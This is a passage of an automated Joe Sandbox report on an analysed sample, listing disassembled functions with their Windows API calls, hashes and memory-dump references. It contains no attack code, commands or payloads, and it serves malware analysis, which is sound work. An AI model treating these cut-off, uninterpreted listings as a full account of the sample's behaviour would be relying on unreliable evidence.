                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00D98F14
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00D98F27
                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00D98F57
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$_memmove$ClassName
                            • String ID: ComboBox$ListBox
                            • API String ID: 365058703-1403004172
                            • Opcode ID: 4638db3a4991feff9a3a7e8c9d0e7b092f1756c032115c0fd2739d4afe149bb0
                            • Instruction ID: 80bc0e9864ba7058ed87a4b77c6b26aa31fc7b7defc3e3a225aaaa360e60e005
                            • Opcode Fuzzy Hash: 4638db3a4991feff9a3a7e8c9d0e7b092f1756c032115c0fd2739d4afe149bb0
                            • Instruction Fuzzy Hash: C421EE71A40109BFDF14ABA08C85DFFB769DF06760F048629F421972E1DB394809AA30
                            Function 00DB182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DB184C
                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DB1872
                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DB18A2
                            • InternetCloseHandle.WININET(00000000), ref: 00DB18E9
                              • Part of subcall function 00DB2483: GetLastError.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB2498
                              • Part of subcall function 00DB2483: SetEvent.KERNEL32(?,?,00DB1817,00000000,00000000,00000001), ref: 00DB24AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                            • String ID:
                            • API String ID: 3113390036-3916222277
                            • Opcode ID: 86677bcef36c15574cd4978881c03925dcdbe92d610c5d3cac1987f36cbdbe2d
                            • Instruction ID: 1427e48fd3da8ecb508556b59931e8b90626d7ed86dc08c70cf320ef358230f4
                            • Opcode Fuzzy Hash: 86677bcef36c15574cd4978881c03925dcdbe92d610c5d3cac1987f36cbdbe2d
                            • Instruction Fuzzy Hash: 4F21ACBA500309BFEB119B618C95EFB76AEFB48744F50412AF806E6240EA208E0597B1
                            Function 00DC63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D41D35: CreateWindowExW.USER32 ref: 00D41D73
                              • Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
                              • Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91
                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00DC6461
                            • LoadLibraryW.KERNEL32(?), ref: 00DC6468
                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00DC647D
                            • DestroyWindow.USER32 ref: 00DC6485
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                            • String ID: SysAnimate32
                            • API String ID: 4146253029-1011021900
                            • Opcode ID: 21a365bfc3187cef68de0c0ccd41e104832be90c2099569231494af5649bae17
                            • Instruction ID: 9d6b65399a11d2dd3316259632c1ee1aefedbb053c17929b6d91471a3e0c58d6
                            • Opcode Fuzzy Hash: 21a365bfc3187cef68de0c0ccd41e104832be90c2099569231494af5649bae17
                            • Instruction Fuzzy Hash: 89216871208206ABEF148FA4DC80FBA77ADEB58328F188629FA50D3190D631DC81A770
                            Function 00DA6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(0000000C), ref: 00DA6DBC
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA6DEF
                            • GetStdHandle.KERNEL32(0000000C), ref: 00DA6E01
                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00DA6E3B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: b36139b0a8cdcdc7a73a420b3de128521aa72ba585ca16b11f0f40926789a7c5
                            • Instruction ID: ab5bc918c4ed19ff6802f236cb85fe835ae34519d47343efff9359a7cf8fda3c
                            • Opcode Fuzzy Hash: b36139b0a8cdcdc7a73a420b3de128521aa72ba585ca16b11f0f40926789a7c5
                            • Instruction Fuzzy Hash: 4E21817560030AEBDF209F39DC04A9ABBA4EF46760F284619FDA0D72D0D770D9508B74
                            Function 00DA6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                            Download Yara Rule
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 00DA6E89
                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00DA6EBB
                            • GetStdHandle.KERNEL32(000000F6), ref: 00DA6ECC
                            • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00DA6F06
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateHandle$FilePipe
                            • String ID: nul
                            • API String ID: 4209266947-2873401336
                            • Opcode ID: 43e82ef34a982485200980cfda7305ab993bf2a6ed3d568a8286ba4860e5518d
                            • Instruction ID: de04e925c2bc9885a813ab3f905f7ca2f49671100a7f95d0fc46f50703eb5b4b
                            • Opcode Fuzzy Hash: 43e82ef34a982485200980cfda7305ab993bf2a6ed3d568a8286ba4860e5518d
                            • Instruction Fuzzy Hash: 04217479500306EBDB209F69DC04A9AB7A8EF46730F284A19FDA1D72D0D770D951CB71
                            Function 00DAAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 00DAAC54
                            • GetVolumeInformationW.KERNEL32 ref: 00DAACA8
                            • __swprintf.LIBCMT ref: 00DAACC1
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000,00DCF910), ref: 00DAACFF
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ErrorMode$InformationVolume__swprintf
                            • String ID: %lu
                            • API String ID: 3164766367-685833217
                            • Opcode ID: ef5c5e586d88b744bba239e73365517e317daf981fcc1f518333fe6b98a56669
                            • Instruction ID: 40586f96f712eff2999e7f18c52b3adb164e9f56ac279db81f0ae37c133fd240
                            • Opcode Fuzzy Hash: ef5c5e586d88b744bba239e73365517e317daf981fcc1f518333fe6b98a56669
                            • Instruction Fuzzy Hash: 7B216035A0020AAFCB10DF69C945DEEBBB9EF49714B104469F909DB352DB31EA41CB31
                            Function 00DA1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 00DA1B19
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID: APPEND$EXISTS$KEYS$REMOVE
                            • API String ID: 3964851224-769500911
                            • Opcode ID: fa9ea3dddf618be1b80a73ac61eccb159fc490779015dfe27254fed49c500053
                            • Instruction ID: abbbf7df354eafd05c38b2ecec8023becf968ac9ea7bf591247a484bde5d51c7
                            • Opcode Fuzzy Hash: fa9ea3dddf618be1b80a73ac61eccb159fc490779015dfe27254fed49c500053
                            • Instruction Fuzzy Hash: 9E113C759002098FCF00EF94D8518FEB7B5FF26304F148465D9A4A73A2EB325906DB70
                            Function 00DBEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DBEC07
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DBEC37
                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00DBED6A
                            • CloseHandle.KERNEL32(?), ref: 00DBEDEB
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                            • String ID:
                            • API String ID: 2364364464-0
                            • Opcode ID: c615c24daf70a5b8f51fcf5b1a2213eab2f8b85fa686b802dab8416e5a0a423d
                            • Instruction ID: 97ac1782955d6517b8c8c7f5a18cbc4c21875f5c417f04dff9a2a8c9d2a36b2d
                            • Opcode Fuzzy Hash: c615c24daf70a5b8f51fcf5b1a2213eab2f8b85fa686b802dab8416e5a0a423d
                            • Instruction Fuzzy Hash: 9E815E716003019FD760EF29C896FAAB7E5EF44710F04881DF99ADB292D7B0AC418BA1
                            Function 00DC0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00DC0E1A: CharUpperBuffW.USER32(?,?), ref: 00DC0E31
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DC00FD
                            • RegOpenKeyExW.ADVAPI32 ref: 00DC013C
                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DC0183
                            • RegCloseKey.ADVAPI32(?), ref: 00DC01AF
                            • RegCloseKey.ADVAPI32(00000000), ref: 00DC01BC
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                            • String ID:
                            • API String ID: 3440857362-0
                            • Opcode ID: 1cd5ce1b698a4901b08f772aae927ddde3bd0c7e317140fe52bcdd7c0e7ae91c
                            • Instruction ID: fbb88744f0857165c07157610fe1b0086ef163f0a1ada3c9025fdd0dfd269737
                            • Opcode Fuzzy Hash: 1cd5ce1b698a4901b08f772aae927ddde3bd0c7e317140fe52bcdd7c0e7ae91c
                            • Instruction Fuzzy Hash: 81512871208305AFD714EF68C881F6ABBE9FF84714F44892DF595872A2DB31E904DB62
                            Function 00DBD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBD927
                            • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBD9AA
                            • GetProcAddress.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBD9C6
                            • GetProcAddress.KERNEL32(00000000,?,?,?,00000041,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBDA07
                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00DBDA21
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00DA7896,?,?,00000000), ref: 00D45A2C
                              • Part of subcall function 00D45A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00DA7896,?,?,00000000,?,?), ref: 00D45A50
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                            • String ID:
                            • API String ID: 327935632-0
                            • Opcode ID: bd835dbe8daa70adc9667734d49a0972ddd9e1d34c48c9f0446c35587654ad5c
                            • Instruction ID: 4a45d908321b4428a5c7cf288c68813054f65a22adff32b26546422be04bc3f1
                            • Opcode Fuzzy Hash: bd835dbe8daa70adc9667734d49a0972ddd9e1d34c48c9f0446c35587654ad5c
                            • Instruction Fuzzy Hash: D4510735A00206DFCB00EFA8C4959EDB7B5EF19320B148165E956AB312D731ED45CFA1
                            Function 00DAE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                            Download Yara Rule
                            APIs
                            • GetPrivateProfileSectionW.KERNEL32 ref: 00DAE61F
                            • GetPrivateProfileSectionW.KERNEL32 ref: 00DAE648
                            • WritePrivateProfileSectionW.KERNEL32 ref: 00DAE687
                              • Part of subcall function 00D49837: __itow.LIBCMT ref: 00D49862
                              • Part of subcall function 00D49837: __swprintf.LIBCMT ref: 00D498AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 00DAE6AC
                            • WritePrivateProfileStringW.KERNEL32 ref: 00DAE6B4
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                            • String ID:
                            • API String ID: 1389676194-0
                            • Opcode ID: 8c8d094a5fe9468f033cec52dd60fee48cbacdd3425d7a7b188ec19b398cb484
                            • Instruction ID: 47528d9fe7f070fc9f603382ff3af5e89331864781fa308d28264b3a083453c1
                            • Opcode Fuzzy Hash: 8c8d094a5fe9468f033cec52dd60fee48cbacdd3425d7a7b188ec19b398cb484
                            • Instruction Fuzzy Hash: C3510D35A00205DFCB11EF65C991AAEBBF5EF49314B1484A5E809AB362CB31ED11DF70
                            Function 00DCA056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ceb61d504131a045bcd67361337f9e3f99f791818888a0943379a28b7e2b710f
                            • Instruction ID: cadd14e3efc4851115fb5842a40fe4592069f6f719242511d24516f127d2f69d
                            • Opcode Fuzzy Hash: ceb61d504131a045bcd67361337f9e3f99f791818888a0943379a28b7e2b710f
                            • Instruction Fuzzy Hash: 3A41D33590421AAFD714DF2CCC48FA9BBA5EB09354F1C4269F955E72E0CB309D41EA71
                            Function 00D42344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AsyncState$ClientCursorScreen
                            • String ID:
                            • API String ID: 4210589936-0
                            • Opcode ID: 14547a7dad37da25e5bac0cddec186296b1a9c35d260848ad71b25ab075839bb
                            • Instruction ID: 16e44fc5b7c3c672c158092343d3fd584d240b25fa05c67900f2ea3a47911c0c
                            • Opcode Fuzzy Hash: 14547a7dad37da25e5bac0cddec186296b1a9c35d260848ad71b25ab075839bb
                            • Instruction Fuzzy Hash: 02417D35604206FFCB258F68C848AE9BB75FB05360F64835EF868962A0D7359990DBB0
                            Function 00D963AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D963E7
                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00D96433
                            • TranslateMessage.USER32(?), ref: 00D9645C
                            • DispatchMessageW.USER32(?), ref: 00D96466
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D96475
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Message$PeekTranslate$AcceleratorDispatch
                            • String ID:
                            • API String ID: 2108273632-0
                            • Opcode ID: cdc3944ed403e54fc3634d7adc3186b43e0c4a38fe32a77c0295a3108bbf5ac1
                            • Instruction ID: efba37996de95771e327690651ba3c28f092673bbd52f8a6ec67ff2d0b79dadb
                            • Opcode Fuzzy Hash: cdc3944ed403e54fc3634d7adc3186b43e0c4a38fe32a77c0295a3108bbf5ac1
                            • Instruction Fuzzy Hash: 5031BE32944646AFDF248FF5CC44FB77BB8AB01300F184165E861D61A0E726D889DB71
                            Function 00D98A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowRect.USER32(?,?), ref: 00D98A30
                            • PostMessageW.USER32 ref: 00D98ADA
                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00D98AE2
                            • PostMessageW.USER32 ref: 00D98AF0
                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00D98AF8
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessagePostSleep$RectWindow
                            • String ID:
                            • API String ID: 3382505437-0
                            • Opcode ID: 7e8816ff0833ae601bafb70501a64332f57d4fef80e179f8733f777181fe2cee
                            • Instruction ID: b3304e70da8be047f74ddeab9489078c2e316d99df8f5bee749ccd0f870cf4e2
                            • Opcode Fuzzy Hash: 7e8816ff0833ae601bafb70501a64332f57d4fef80e179f8733f777181fe2cee
                            • Instruction Fuzzy Hash: 3131C07150021AEBDF14CFA8DD4CADE3BB5EB05715F14822AF965E72D0C7B09914EBA0
                            Function 00D9B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                            Download Yara Rule
                            APIs
                            • IsWindowVisible.USER32(?), ref: 00D9B204
                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00D9B221
                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00D9B259
                            • CharUpperBuffW.USER32(00000000,00000000), ref: 00D9B27F
                            • _wcsstr.LIBCMT ref: 00D9B289
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                            • String ID:
                            • API String ID: 3902887630-0
                            • Opcode ID: 402b731101056b2abf03cb264fe64b19e09fa9c0999ac0b132ce3f5fabc08b92
                            • Instruction ID: e9090af1f067a135c25d803b1a882f40b8c35a7d0752677d5999679217ed5943
